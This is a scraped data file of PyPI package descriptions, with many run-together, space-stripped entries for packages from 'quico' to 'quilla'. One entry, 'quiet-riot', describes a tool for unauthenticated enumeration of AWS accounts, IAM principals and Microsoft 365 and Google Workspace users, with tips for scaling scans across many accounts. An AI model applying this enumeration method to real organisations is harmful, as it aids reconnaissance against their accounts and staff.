3Installation$./install.shUtilisation$quico[-h]-tTAG[-nNETWORK][-fFILE][-pPUBLISH][-vVOLUME]directory\n\nQuicoouquick-containerpermetdecompilerpuislancerrapidementun\nconteneurdocker.\n\npositionalarguments:directoryDossieroucompilerl'imagedocker.\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-tTAG,--tagTAG-nNETWORK,--networkNETWORKR\u00e9seauoulancerleconteneurdocker-fFILE,--fileFILECheminversleDockerfile\u00e0compiler-pPUBLISH,--publishPUBLISH-vVOLUME,--volumeVOLUME"} +{"package": "quico-pkg-johannhospice", "pacakge-description": "QuicoQuico ou quick-container est un raccourci pour docker. Il permet de compiler et lancer rapidement un conteneur.Environnement requispython 3Installation$./install.shUtilisation$quico[-h]-tTAG[-nNETWORK][-fFILE][-pPUBLISH][-vVOLUME]directory\n\nQuicoouquick-containerpermetdecompilerpuislancerrapidementun\nconteneurdocker.\n\npositionalarguments:directoryDossieroucompilerl'imagedocker.\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-tTAG,--tagTAG-nNETWORK,--networkNETWORKR\u00e9seauoulancerleconteneurdocker-fFILE,--fileFILECheminversleDockerfile\u00e0compiler-pPUBLISH,--publishPUBLISH-vVOLUME,--volumeVOLUME"} +{"package": "quic-qpack", "pacakge-description": "No description available on PyPI."} +{"package": "quict", "pacakge-description": "No description available on PyPI."} +{"package": "quict-ml", "pacakge-description": "No description available on PyPI."} +{"package": "quict-sim", "pacakge-description": "No description available on PyPI."} +{"package": "quic-version-detector", "pacakge-description": "This is a small tool that queries QUIC servers for their supported versions.It\u2019s implemented in python3.InstallationGlobal:$ pip install quic-version-detectorOr inside virtual environment:$ virtualenv --python=python3 pyenv\n$ pyenv/bin/pip install quic-version-detector"} +{"package": "quidam", "pacakge-description": "No description available on PyPI."} +{"package": "quidax-python", "pacakge-description": "quidax-pythonPython plugin forQuidaxView onpypi.python.orgInstallationpipinstallquidax-pythonInstantiate Quidaxfromquidaxapi.quidaximportQuidaxquidax_secret_key=\"5om3secretK3y\"quidax=Quidax(secret_key=quidax_secret_key)# to use users classquidax.users.all_sub_account()# to list all marketsquidax.markets.list_all_markets()# to fetch user tradesquidax.trades.trades(user_id)# to fetch wallets from a user and a specific wallet.quidax.wallets.fetch_a_specific_currency_wallet(user_id,currency)DOC Reference:https://developer.quidax.com/Other methods can be found in the docs folderAvailable resourcesUsersOrdersInstantOrdersMarketsWalletsWithdrawalDepositsTradesQuotesPlease reference thedocsfolder for usage,This repo won't be possible without the hard work ofandela-sjames."} +{"package": "quidditas", "pacakge-description": "Installationpip install quidditasFrom sourceUse the setup.py to create a bdist or sdist you can install with pip.Directory layoutquidditas - Quidditas source file and tests\nexamples - Contains small example games using pygame and quidditasUsageTo import and instantiate quidditas:from quidditas import Quidditas, Processor\n\nq = Quidditas()Further informationSee the quidditas homepage for more help athttp://quidditas.googlecode.com/"} +{"package": "quiele", "pacakge-description": "Quiele0.0.2InstallpipinstallquieleFeaturesPrint with color tagsThere are three modes each with it's own colorUsagefromquieleimportinkink(50,mode=\"Metric\")"} +{"package": "quienesquien", "pacakge-description": "quienesquien-pythonCliente para el servicio de listas de QuienesquienRequerimientosPython v3 o superior"} +{"package": "quiet", "pacakge-description": "UNKNOWN"} +{"package": "quietex", "pacakge-description": "QuieTeXMake your LaTeX build output just show the important stuff (seeherefor before and after screen recordings):QuieTeX is a minimal command-line tool which filters and colourizes the output ofpdflatexin real-time.It is not a build tool, it does not do any clever summaries, it just makes it easier to read.FeaturesHides open/close file loggingColours errors redColours warnings yellowTeX input prompt works inerrorstopmodeandscrollmodelatexmkintegrationUsageTo install:pip3installquietexTo use:quietexpdflatextest.texTo use withlatexmk, add this to yourlatexmkrc:# Make output prettiereval`quietex --latexmkrc`;"} +{"package": "quiet.py", "pacakge-description": "quiet.pyPython ctypes bindings for libquiet to transmit data with sound.UsageEncode a message, and then decode itfrom quiet import Encode, Decoder\n\ndef test():\n encoder = Encoder()\n decoder = Decoder()\n\n for chunk in encoder.encode('hello, world'):\n message = decoder.decode(chunk)\n if message is not None:\n print(message)\n\n\ntest()decode messages from recording in realtimeimport sys\nimport pyaudio\nfrom quiet import Encode, Decoder\n\ndef decode():\n if sys.version_info[0] < 3:\n import Queue as queue\n else:\n import queue\n\n FORMAT = pyaudio.paFloat32\n CHANNELS = 1\n RATE = 44100\n CHUNK = 16384 # int(RATE / 100)\n\n p = pyaudio.PyAudio()\n q = queue.Queue()\n\n def callback(in_data, frame_count, time_info, status):\n q.put(in_data)\n return (None, pyaudio.paContinue)\n\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK,\n stream_callback=callback)\n\n count = 0\n with Decoder(profile_name='ultrasonic-experimental') as decoder:\n while True:\n try:\n audio = q.get()\n audio = numpy.fromstring(audio, dtype='float32')\n # audio = audio[::CHANNELS]\n code = decoder.decode(audio)\n if code is not None:\n count += 1\n print(code.tostring().decode('utf-8', 'ignore'))\n except KeyboardInterrupt:\n break\n\n\ndecode()"} +{"package": "quiet-py-wasm", "pacakge-description": "No description available on PyPI."} +{"package": "quiet-riot", "pacakge-description": "Quiet Riot:notes:C'mon, Feel The Noise:notes:An enumeration tool for scalable, unauthenticated validation of AWS principals; including AWS Acccount IDs, root e-mail addresses, users, and roles.Credit:Daniel Grzelak@dagrzfor identifying the technique and Will Bengston@__musclesfor inspiring me to scale it.See the introductory blog posthere.See a defender's perspective blog posthere.Getting Started With Quiet RiotPrerequisitesboto3/botocoreSufficient AWS credentials configured via CLIInstallation:First step is to have sufficient AWS credentials configured via CLI. If you do not have your own AWS acccount or sufficient credentials in an AWS account, Quiet Riot will not work.Create the virtual environment, or you can directly install the quiet_riot pkg using pip.For installing this package you can run the command pip install quiet-riot. After installing the package you can run the command quiet_riot --helpUsage:Arguments for quiet_riot are --scan_type, --threads, --wordlist, --profileYou can provide values for arguments required to run this package. Must require argument is scan_type.for e.g quiet_riot --scan_type 3 --threads 30 --wordlist D:\\path_to_wordlist_file --profile DefaultOr you can use the short form for arguments as well like --s, --t, --w, --p--scan_type, --sWhat type of scan do you want to attempt? Enter the type of scan for example1. AWS Account IDs\n 2. Microsoft 365 Domains\n 3. AWS Services Footprinting\n 4. AWS Root User E-mail Address\n 5. AWS IAM Principals\n 4.1. IAM Roles\n 4.2. IAM Users\n 6. Microsoft 365 Users (e-mails)\n 7. Google Workspace Users (e-mails)--threads, --tFor number of threads you have to provide the number for e.g 23 , 30 90 etc. Approximately how many threads do you think you want to run?Hint: 2020 M1 Macbook Air w/ 16 GB RAM optimizes @ around 700 threads from limited testing.--wordlist, --wPath to the world list file which will be required for scan.--profile, --pProvide the name of aws profile configured through cli for e.g Default,DevFeatureploitation LimitsThrottlingAfter performing extensive analysis of scaling methods using the AWS Python (Boto3) SDK, I was able to determine that the bottleneck for scanning (at least for Python and awscli -based tools) is I/O capacity of a single-threaded Python application. After modifying the program to run with multiple threads, I was able to trigger exceptions in individual threads due to throttling by the various AWS APIs. You can see the results from running a few benchmarking test scanshere. APIs that I tested had wildly different throttling limits and notably, s3 bucket policy attempts took ~10x as long as similar attempts against other services.With further testing, I settled on a combination of SNS, ECR-Public, and ECR-Private services running in US-East-1 in ~40%/50%/10% configuration split with ~700 threads. The machine I used was a 2020 Macbook Air (M1 and 16 GB RAM). This configuration yielded on average ~1100 calls/sec, though the actual number of calls can fluctuate significantly depending on a variety of factors including network connectivity. Under these configurations, I did occasionally throw an exception on a thread from throttling...but I have subsequently configured additional re-try attempts (4 -> 7) via botocore that will eliminate this issue with a minor performance trade-off.Computational DifficultyTo attempt every possible Account ID in AWS (1,000,000,000,000) would require an infeasible amount of time given only one account. Even assuming absolute efficiency*, over the course of a day an attacker will only be able to make 95,040,000 validation checks. Over 30 days, this is 2,851,200,000 validation checks and we are still over 28 years away from enumerating every valid AWS Account ID. Fortunately, there is nothing stopping us from registering many AWS accounts and automating this scan. While there is an initial limit of 20 accounts per AWS organization, I was able to get this limit increased for my Organization via console self-service and approval from an AWS representative. The approval occured without any further questions and now I'm off to automating this writ large. Again, assuming absolute efficiency, the 28 years scanning could potentially be reduced down to ~100 days.*~1100 API calls/check per second in perpetuity per account and never repeating a guessed Account ID.Potential Supported Services#AWS ServiceDescriptionAPI LimitsResource PricingEnumeration Capability1SNSManaged Serverless Notification ServiceUnknownUnknownYes2KMSEncryption Key Management ServiceUnknownUnknownYes3SecretsManagerManaged Secret StoreUnknownUnknownYes4CodeArtifactManaged Source Code RepositoryUnknownUnknownYes5ECR PublicManaged Container RegistryUnknownUnknownYes6ECR PrivateManaged Container RegistryUnknownUnknownYes7LambdaManaged Serverless FunctionUnknownUnknownYes8s3Managed Serverless Object StoreUnknownUnknownYes9SESSMTP Automation ServiceUnknownUnknownUnknown10ACMPrivate Certificate AuthorityUnknownUnknownUnknown11CodeBuildSoftware Build AgentUnknownUnknownUnknown12AWS BackupManaged Backup ServiceUnknownUnknownUnknown13Cloud9Managed IDEUnknownUnknownUnknown14GlueManaged ETL Job ServiceUnknownUnknownUnknown15EKSManaged K8s ServiceUnknownUnknownUnknown16Lex V2Managed NLP ServiceUnknownUnknownUnknown17CloudWatch LogsManaged Log Pipeline/MonitoringUnknownUnknownUnknown18VPC EndpointsManaged Virtual NetworkUnknownUnknownUnknown19Elemental MediaStoreUnknownUnknownUnknownUnknown20OpenSearchManaged ElasticSearchUnknownUnknownUnknown21EventBridgeManaged Serverless Event HubUnknownUnknownUnknown22EventBridge SchemasManaged Serverless Event HubUnknownUnknownUnknown23IoTInternet-of-Things ManagementUnknownUnknownUnknown24s3 GlacierCold Object StorageUnknownUnknownUnknown25ECSManaged Container OrchestrationUnknownUnknownUnknown26Serverless Application RepositoryManaged Source Code RepositoryUnknownUnknownNo27SQSManaged Serverless Queueing ServiceUnknownUnknownNo28EFSManaged Serverless Elastic File SystemUnknownUnknownNo"} +{"package": "quiet-riot-aws", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quiffen", "pacakge-description": "Quiffen is a Python package for parsing QIF (Quicken Interchange Format) files.The package allows users to both read QIF files and interact with the contents, and also to create a QIF structure\nand then output to either a QIF file, a CSV of transaction data or a pandas DataFrame.QIF is an old file type, but has its merits because:It\u2019s standardised (apart from dates, but that can be dealt with)Unlike CSVs, QIF files all follow the same format, so they don\u2019t require special attention when they come from\ndifferent sourcesIt\u2019s written in plain textFeaturesImport QIF files and manipulate dataCreate QIF structures (support for Transactions, Investments, Accounts, Categories, Classes, Splits)Convert Qif objects to a number of different formats and export (pandas DataFrame, CSV, QIF file)UsageHere\u2019s an example parsing of a QIF file:>>> from quiffen import Qif, QifDataType\n>>> import decimal\n>>> qif = Qif.parse('test.qif', day_first=False)\n>>> qif.accounts\n{'Quiffen Default Account': Account(name='Quiffen Default Account', desc='The default account created by Quiffen when no\nother accounts were present')}\n>>> acc = qif.accounts['Quiffen Default Account']\n>>> acc.transactions\n{'Bank': TransactionList(Transaction(date=datetime.datetime(2021, 2, 14, 0 , 0), amount=decimal.Decimal(150.0), ...), ...),\n'Invst': TransactionList(...)}\n>>> tr = acc.transactions['Bank'][0]\n>>> print(tr)\nTransaction:\n Date: 2020-02-14 00:00:00\n Amount: 67.5\n Payee: T-Mobile\n Category: Cell Phone\n Split Categories: ['Bills']\n Splits: 2 total split(s)\n>>> qif.categories\n{'Bills': Category(name='Bills), expense=True, hierarchy='Bills'}\n>>> bills = qif.categories['Bills']\n>>> print(bills.render_tree())\nBills (root)\n\u2514\u2500 Cell Phone\n>>> df = qif.to_dataframe(data_type=QifDataType.TRANSACTIONS)\n>>> df.head()\n date amount payee ... memo cleared check_number\n0 2020-02-14 67.5 T-Mobile ... NaN NaN NaN\n1 2020-02-14 32.0 US Post Office ... money back for damaged parcel NaN NaN\n2 2020-12-02 -10.0 Target ... two transactions, equal NaN NaN\n3 2020-11-02 -25.0 Walmart ... non split transaction X 123.0\n4 2020-10-02 -100.0 Amazon.com ... test order 1 * NaN\n...And here\u2019s an example of creating a QIF structure and exporting to a QIF file:>>> import quiffen\n>>> from datetime import datetime\n>>> qif = quiffen.Qif()\n>>> acc = quiffen.Account(name='Personal Bank Account', desc='My personal bank account with Barclays.')\n>>> qif.add_account(acc)\n>>> groceries = quiffen.Category(name='Groceries')\n>>> essentials = quiffen.Category(name='Essentials')\n>>> groceries.add_child(essentials)\n>>> qif.add_category(groceries)\n>>> tr = quiffen.Transaction(date=datetime.now(), amount=150.0)\n>>> acc.add_transaction(tr, header=quiffen.AccountType.BANK)\n>>> qif.to_qif() # If a path is provided, this will save the file too!\n'!Type:Cat\\nNGroceries\\nETrue\\nIFalse\\n^\\nNGroceries:Essentials\\nETrue\\nIFalse\\n^\\n!Account\\nNPersonal Bank Account\\nDMy\npersonal bank account with Barclays.\\n^\\n!Type:Bank\\nD02/07/2021\\nT150.0\\n^\\n'DocumentationDocumentation can be found at:https://quiffen.readthedocs.io/en/latest/InstallationInstall Quiffen by running:>>> pip install quiffenDependenciespandas(optional) for exporting to DataFramesTheto_dataframe()method will not work without pandas installed.To-DosAdd support for theMemorizedTransactionobject present in QIF files.ContributeGitHub pull requests welcome, though if you want to make a major change, please open an issue first for discussion.Issue Tracker:https://github.com/isaacharrisholt/quiffen/issuesSource Code:https://github.com/isaacharrisholt/quiffenSupportIf you are having issues, please let me know.LicenseThe project is licensed under the GNU GPLv3 license."} +{"package": "quik", "pacakge-description": "A fast and lightweight Python template engineFeaturesEasy to use.High performance.Autoescaping.Template inheritance.Supports native python expressions.NutshellHere a small example of a Quik template
    #for @user in @users:\n #if @user.age > 18:
  • @user.username
  • #end\n #end
Use ItRender via template:fromquikimportFileLoaderloader=FileLoader('html')template=loader.load_template('index.html')printtemplate.render({'author':'Thiago Avelino'},loader=loader).encode('utf-8')"} +{"package": "quik-config", "pacakge-description": "What is this?A config system that doesn't waste your timeper-machine settings that stay in synca consistent way to handle filepaths (stop hardcoding filepaths as python strings!)hierarchical, with inheritable groups of settings (profiles)default works along sideargparse, but also can just replace it entirely for rapid developmentall values in the hierarchy can be overridden with CLI argsselect multiple profiles from CLI (ex: GPU & DEV or UNIX & GPU & PROD)can combine/import multiple config filesHow do I use this?pip install quik-configIn aconfig.py:fromquik_configimportfind_and_loadinfo=find_and_load(\"info.yaml\",# walks up folders until it finds a file with this namecd_to_filepath=True,# helpful if using relative pathsfully_parse_args=True,# if you already have argparse, use parse_args=True insteadshow_help_for_no_args=False,# change if you want)print(info.config)# dictionaryCreateinfo.yamlwith a structure like this:# names in parentheses are special, all other names are not!# (e.g. add/extend this with any custom fields)(project):# the local_data file will be auto-generated# (its for machine-specific data)# so probably git-ignore whatever path you pick(local_data):./local_data.ignore.yaml# example profiles(profiles):(default):blah:\"blahblahblah\"mode:development# or production. Same thing reallyhas_gpu:maybeconstants:pi:3# its 'bout 3PROFILE1:constants:e:2.7182818285PROD:mode:productionconstants:pi:3.1415926536problems:trueThen run it:python./config.pyWhich will print out this config:{\"blah\":\"blah blah blah\",# from (default)\"mode\":\"development\",# from (default)\"has_gpu\":\"maybe\",# from (default)\"constants\":{\"pi\":3,# from (default)},}FeaturesBuiltin Helppython./config.py--help--profilesavailable profiles:\n - DEV\n - GPU\n - PROD\n\nas cli argument:\n -- --profiles='[\"DEV\"]'\n -- --profiles='[\"GPU\"]'\n -- --profiles='[\"PROD\"]'---------------------------------------------------------------------------------\n QUIK CONFIG HELP\n ---------------------------------------------------------------------------------\n \n open the file below and look for \"(profiles)\" for more information:\n $PWD/info.yaml\n \n examples:\n python3 ./ur_file.py -- --help --profiles\n python3 ./ur_file.py -- --help key1\n python3 ./ur_file.py -- --help key1:subKey\n python3 ./ur_file.py -- --help key1:subKey key2\n python3 ./ur_file.py -- --profiles='[YOUR_PROFILE, YOUR_OTHER_PROFILE]'\n python3 ./ur_file.py -- thing1:\"Im a new value\" part2:\"10000\"\n python3 ./ur_file.py -- thing1:\"I : cause errors\" part2:10000\n python3 ./ur_file.py -- 'thing1:\"I : dont cause errors\" part2:10000\n python3 ./ur_file.py -- 'thing1:[\"Im in a list\"]'\n python3 ./ur_file.py -- 'thing1:part_A:\"Im nested\"'\n python3 ./ur_file.py \"I get sent to ./ur_file.py\" -- part2:\"new value\"\n python3 ./ur_file.py \"I get ignored\" \"me too\" -- part2:10000\n \n how it works:\n - the \"--\" is a required argument, quik config only looks after the --\n - given \"thing1:10\", \"thing1\" is the key, \"10\" is the value\n - All values are parsed as json/yaml\n - \"true\" is boolean true\n - \"10\" is a number\n - '\"10\"' is a string (JSON escaping)\n - '\"10\\n\"' is a string with a newline\n - '[10,11,hello]' is a list with two numbers and an unquoted string\n - '{\"thing\": 10}' is a map/object\n - \"blah blah\" is an un-quoted string with a space. Yes its valid YAML\n - multiline values are valid, you can dump an whole JSON doc as 1 arg\n - \"thing1:10\" overrides the \"thing1\" in the (profiles) of the info.yaml\n - \"thing:subThing:10\" is shorthand, 10 is the value, the others are keys\n it will only override the subThing (and will create it if necessary)\n - '{\"thing\": {\"subThing\":10} }' is long-hand for \"thing:subThing:10\"\n - '\"thing:subThing\":10' will currently not work for shorthand (parse error)\n \n options:\n --help\n --profiles\n \n ---------------------------------------------------------------------------------\n \n your default top-level keys:\n - mode\n - has_gpu\n - constants\n your local defaults file:\n ./local_data.ignore.yaml\n your default profiles:\n - DEV\n \n ---------------------------------------------------------------------------------Select Profiles from CLIpython./config.py@PROFILE1prints:{\"blah\":\"blah blah blah\",# from (default)\"mode\":\"development\",# from (default)\"has_gpu\":\"maybe\",# from (default)\"constants\":{\"pi\":3.1415926536,# from (default)\"e\":2.7182818285,# from PROFILE1},}python./config.py@PROFILE1@PRODprints:{\"blah\":\"blah blah blah\",# from (default)\"mode\":\"production\",# from PROD\"has_gpu\":\"maybe\",# from (default)\"constants\":{\"pi\":3.1415926536,# from (default)\"e\":2.7182818285,# from PROFILE1\"problems\":True,# from PROD},}Override Values from CLIpython./config.py@PROFILE1mode:customconstants:problems:99prints:{\"blah\":\"blah blah blah\",# from (default)\"mode\":\"custom\",# from CLI\"has_gpu\":\"maybe\",# from (default)\"constants\":{\"pi\":3.1415926536,# from (default)\"e\":2.7182818285,# from PROFILE1\"problems\":99,# from CLI},}Again but with really complicated arguments:(each argument is parsed as yaml)python./run.pyarg1--mode:my_custom_mode'constants: { tau: 6.2831853072, pi: 3.1415926, reserved_letters: [ \"C\", \"K\", \"i\" ] }'prints:config:{\"mode\":\"my_custom_mode\",\"has_gpu\":False,\"constants\":{\"pi\":3.1415926,\"tau\":6.2831853072,\"reserved_letters\":[\"C\",\"K\",\"i\",],},}unused_args:[\"arg1\"]Working Alongside Argparse (quick)Removefully_parse_argsand replace it with justparse_argsinfo=find_and_load(\"info.yaml\",parse_args=True,# <- will only parse after --)Everthing in the CLI is the same, but it waits for--For example:# quik_config ignores arg1 --arg2 arg3, so argparse can do its thing with thempython./config.pyarg1--arg2arg3--@PRODWorking Alongside Argparse (advanced)Arguments can simply be passed as a list of strings, which can be useful for running many combinations of configs.info=find_and_load(\"info.yaml\",args=[\"@PROD\"],)Relative and absolute pathsAdd them to the info.yaml(project):(local_data):./local_data.ignore.yaml# filepaths (relative to location of info.yaml)(path_to):this_file:\"./info.yaml\"blah_file:\"./data/results.txt\"# example profiles(profiles):(default):blah:\"blahblahblah\"Access them in pythoninfo=find_and_load(\"info.yaml\")info.path_to.blah_fileinfo.absolute_path_to.blah_file# nice when then PWD != folder of the info fileImport other yaml filesFIXMEDifferent Profiles For Different MachinesLets say you've several machines and an info.yaml like this:(project):(profiles):DEV:cores:1database_ip:192.168.10.10mode:devLAPTOP:cores:2DESKTOP:cores:8UNIX:line_endings:\"\\n\"WINDOWS:line_endings:\"\\r\\n\"PROD:database_ip:183.177.10.83mode:prodcores:32And lets say you have aconfig.pylike this:fromquik_configimportfind_and_loadinfo=find_and_load(\"info.yaml\",defaults_for_local_data=[\"DEV\",],# if the ./local_data.ignore.yaml doesnt exist,# => create it and add DEV as the default no-argument choice)Run the code once to get a./local_data.ignore.yamlfile.Each machine gets to pick the profiles it defaults to.So, on your Macbook you can edit the./local_data.ignore.yamlto include something like the following:(selected_profiles):-LAPTOP# the cores:2 will be used (instead of cores:1 from DEV)-UNIX# because LAPTOP is higher in the list than DEV-DEVOn your Windows laptop you can edit it and put:(selected_profiles):-LAPTOP-WINDOWS-DEVCommand Line ArgumentsIf you haverun.pylike this:fromquik_configimportfind_and_loadinfo=find_and_load(\"info.yaml\",parse_args=True)print(\"config:\",info.config)print(\"unused_args:\",info.unused_args)## call some other function you've got##from your_code import run#run(*info.unused_args)Example 0Using the python file and config file abovepython./run.pyRunning that will output:config:{\"mode\":\"development\",\"has_gpu\":False,\"constants\":{\"pi\":3}}unused_args:[]Example 1Show help. This output can be overridden in the info.yaml by setting(help):under the(project):key.python./run.py----helpNote the--is needed in front of the help.You can also addshow_help_for_no_args=Trueif you want that behavior.Ex:fromquik_configimportfind_and_loadinfo=find_and_load(\"info.yaml\",show_help_for_no_args=Trueparse_args=True,)Example 2Again but selecting some profilespython./run.pyarg1----profiles='[PROD]'# orpython./run.pyarg1--@PRODOutput:config:{\"mode\":\"production\",\"has_gpu\":False,\"constants\":{\"pi\":3.1415926536,\"problems\":True,},}unused_args:[\"arg1\"]Example 3Again but with custom arguments:python./run.pyarg1--mode:my_custom_modeconstants:tau:6.2831853072config:{\"mode\":\"my_custom_mode\",\"has_gpu\":False,\"constants\":{\"pi\":3,\"tau\":6.2831853072,},}unused_args:[\"arg1\"]Example 4Again but with really complicated arguments:(each argument is parsed as yaml)python./run.pyarg1--mode:my_custom_mode'constants: { tau: 6.2831853072, pi: 3.1415926, reserved_letters: [ \"C\", \"K\", \"i\" ] }'prints:config:{\"mode\":\"my_custom_mode\",\"has_gpu\":False,\"constants\":{\"pi\":3.1415926,\"tau\":6.2831853072,\"reserved_letters\":[\"C\",\"K\",\"i\",],},}unused_args:[\"arg1\"]"} +{"package": "quikcsv", "pacakge-description": "QuikCSVPython package for quickly creating temporary csv files to help with testing. The CSV file exists in memory only so you can create files on the fly without needing to cleanup or delete files later. No need to use with statements or close resources, that is taken care of.InstallationNot ready just yet.SampleTake a function that takes an open CSV file as its argument. Instead of creating and opening an actual CSV file on the disk, decorate the function.fromquikcsvimportQuikCSV@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']])])defcsv_func(csv_file):# Work with csv file here.## QuikCSV.one will map the data above to mimic a csv file with the# respective columns and rows, passing the file to the csv_file argument# (or by default, the first argument if there are multiple.)If you want, you can specify the argument that the CSV mock file will be passed to.@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']],arg='csv_file')])defcsv_func(first_arg,csv_file,third_arg):# Mock CSV will be accessible on the csv_file variable.Options can be passed via the opts argument to quickly generate additional rows of data from existing rows.@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']],opts=dict(add_rows=2,row_pattern='copy',base_row_index=1))])defcsv_func(csv_file):# Output csv file will look like this:## Column A, Column B, Column C# 100, 101, 102# 100, 101, 102# 100, 101, 102## 2 rows of data are added, copied from index 1 of the passed data.'copy' is a predefined row creation pattern to make things easy, but you can also pass a custom function@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']],opts=dict(add_rows=2,row_pattern=lambdax:[n+1forninx],base_row_index=1))])defcsv_func(csv_file):# Output csv file will look like this:## Column A, Column B, Column C# 100, 101, 102# 101, 102, 103# 101, 102, 103## The passed function should apply against the row of data, not the# individual element.The above example applies the same function to the same row again and again, but by setting the 'incremental' option to True, the function will apply the newly created row of data on the next iteration.@QuikCSV([dict(data=[['Column A','Column B','Column C'],['100','101','102']],opts=dict(add_rows=2,row_pattern=lambdax:[n+1forninx],base_row_index=1,increment=True))])defcsv_func(csv_file):# Output csv file will look like this:## Column A, Column B, Column C# 100, 101, 102# 101, 102, 103# 102, 103, 104#Features in the worksRandom data generation - completely random or pseudo-random via user defined options"} +{"package": "quikenv", "pacakge-description": "QuikenvThis was wrapper around the python dot-env project athttps://github.com/theskumar/python-dotenvhttps://pypi.org/project/python-dotenv/Here is the pypi release I made:https://pypi.org/project/quikenv/I really liked the project but wanted something even more lazy. All credit goes to the original developers. I only added features I wanted on top of an already really great project.This wrapper has the following features:A ezload() classmethod that automatically looks for for your .env file in the current working directory and 2 dirs upimport quikenv\n\nenv = quikenv.ezload()\nvar = env.get(\"my_environment_var\")\nprint(env.environment_variables)A proper_load() classmethod that will load this class with a given file pathimport quikenv\n\nenv_path = \"C:/somedir/.env\"\nenv = quikenv.proper_load(env_path)\nvar = env.get(\"my_environment_var\")\nprint(env.environment_variables)A normal procedural start for the classimport quikenv\n\nenv_path = \"C:/somedir/.env\"\nenv = quickenv.Quikenv(env_path)\nenv.load()\nvar = env.get(\"my_environment_var\")\nprint(env.environment_variables)A lot of safety features (I don't think speed is relevant here):Errors out when you give it an invalid file path to the .env fileWill NOT add values from your computer and will only use values from your .env fileErrors out when you try to get a value that doesn't exist or has am empty valueMy years of programming has taught me that I'm still stupid enough to do this. You probably are too.At least you get told now when something is null/empty instead of spending 2 hours debugging your idiocy."} +{"package": "quikey", "pacakge-description": "No description available on PyPI."} +{"package": "quikkly-python-sdk", "pacakge-description": "# Quikkly Python SDK #Note: to use this Python SDK, you need the Quikkly core native library.\nPlease contactdavid@quikklycodes.comfor more information and pricing.## Install ##pip install quikkly-python-sdk## Dependencies ##Python 2.7 or 3.6.Generating SVG codes has no dependencies besides the qukklycore native library files. Generating PNG and JPEG codes requires installing the ImageMagick library with librsvg support.Scanning codes from images also requires thenumpyandPillowPython packages.## Version History ##3.4.9 - Add quikkly.get_template_info() method and command-line script to export blueprint metadata. This includes also the maximum data values which are not present in the file itself. Update to require Quikkly core libs v3.4.9.3.4.8 - Fix setup.py3.4.7 - Renamedquikkly-generate-svg.pytoquikkly-generate-code.py. Add support for PNG and JPEG output formats if ImageMagick is installed.3.4.6 - Fix compatibility with Quikkly core libs v3.4.5 for scanning.3.4.5 - Update to Quikkly core libs v3.4.5. No Python SDK changes.3.4.3 - Update to Quikkly core libs v3.4.3. No Python SDK changes.3.4.1 - Update to Quikkly core libs v3.4.1. No Python SDK changes.3.3.4 - Update to Quikkly core libs v3.3.4. No Python SDK changes.3.3.2 - Update to Quikkly core libs v3.3.2. No Python SDK changes.3.2.1 - Add support for encoding/decoding data values as alphanumeric strings.3.2.0 - Update to Quikkly core libs v3.2.0, reverting some style changes to templates. No Python SDK changes.3.1.0 - Update to Quikkly core libs v3.1.0, with more styling options and templates. No Python SDK changes.1.0.0 - Support for generating SVG codes, scanning images, plus command-line scripts for both.0.1.0 - First Release.## Making a Release ##Check that setup.py version has been updated to new version,Check that README.md version history has been updated,Check that quikklycore.py version has been updated to compatible native lib versions,Check that you are in a virtualenv with python3 as default,Run ./pypi-upload.sh"} +{"package": "quik-LIMOJ", "pacakge-description": "No description available on PyPI."} +{"package": "quiktools", "pacakge-description": "No description available on PyPI."} +{"package": "quil", "pacakge-description": "Quil\u26a0\ufe0f In DevelopmentThequilpackage provides tools for constructing, manipulating, parsing, and printingQuilprograms. Internally, it is powered byquil-rs.This package is still in early development and breaking changes should be expected between minor versions.DocumentationDocumentation for the current release ofquilis publishedhere. Every version ofquilshipswith type stubsthat provide type hints and documentation to Python tooling and editors that support theLanguage Server Protocolor similar."} +{"package": "quilbert", "pacakge-description": "IntroductionQuilbert: A Python AI Voice Assistant with State Machine DesignQuilbert is a GPT powered AI voice assistant built using Python.\nThis project utilizes a state machine design pattern to efficiently handle user input, process it, and provide relevant responses.\nWith Quilbert, you can easily access information, ask questions, and receive helpful responses using only your voice.To get started with Quilbert, follow these steps:$ pip install Quilbert\n$ quilbert --debugOnce running, Quilbert will begin listening for the wakeword \"porcupine\". When you say \"porcupine\", Quilbert will become active and start listening for your questions or commands.Please note some common issues you might encounter:OpenAI API not set: Configure your OpenAI API key by runningexport OPENAI_API_KEY=.Picovoice access key not set: Set up your Picovoice access key usingexport PICOVOICE_ACCESS_KEY=.Pyaudio import fails because portaudio is not installed: Install portaudio usingbrew install portaudioon mac.Architecture OverviewQuilbert's architecture is based on a state machine with three primary states: sleeping, listening, and processing.\nThe state diagram for Quilbert's architecture can be visualized using Mermaid:stateDiagram\nsleeping --> listening\nlistening --> processing\nprocessing --> listening\nprocessing --> sleepingBy using this state machine design, Quilbert efficiently handles user interactions, providing a seamless and responsive voice assistant experience.Sleeping stateIn the sleeping state, Quilbert processes audio chunks, listens for the wakeword, and discards the audio data.\nThe transitions are as follows:Sleeping to listening: Triggered when the wake word is detected.Listening stateWhen in the listening state, Quilbert processes audio chunks, listens for voice activity, and stores the chunks in a buffer. The possible transitions are:Listening to sleeping: Triggered when no processing occurs after two minutes of listening.Listening to processing: Triggered when voice activity is detected for 0.25 seconds, followed by one second of inactivity.Processing stateIn the processing state, Quilbert takes the following actions:Converts the buffered audio to text.Fetches a response from the AI model.Plays the response using text-to-speech synthesis.The transitions from processing state are:Processing to sleeping: Triggered when the user says \"stop\" or another stop phrase.Processing to listening: Triggered immediately after processing is complete."} +{"package": "quilc", "pacakge-description": "No description available on PyPI."} +{"package": "quill", "pacakge-description": "No description available on PyPI."} +{"package": "quilla", "pacakge-description": "QuillaDeclarative UI Testing with JSONQuilla is a framework that allows test-writers to perform UI testing using declarative syntax through JSON files. This enables test writers, owners, and maintainers to focus not on how to use code libraries, but on what steps a user would have to take to perform the actions being tested. In turn, this allows for more agile test writing and easier-to-understand test cases.Quilla was built to be run in CI/CD, in containers, and locally. It also comes with an optional integration withpytest, so you can write your Quilla test cases as part of your regular testing environment for python-based projects. Check out thequilla-pytestdocs for more information on how to configurepytestto auto-discover Quilla files, adding markers, and more.Check out 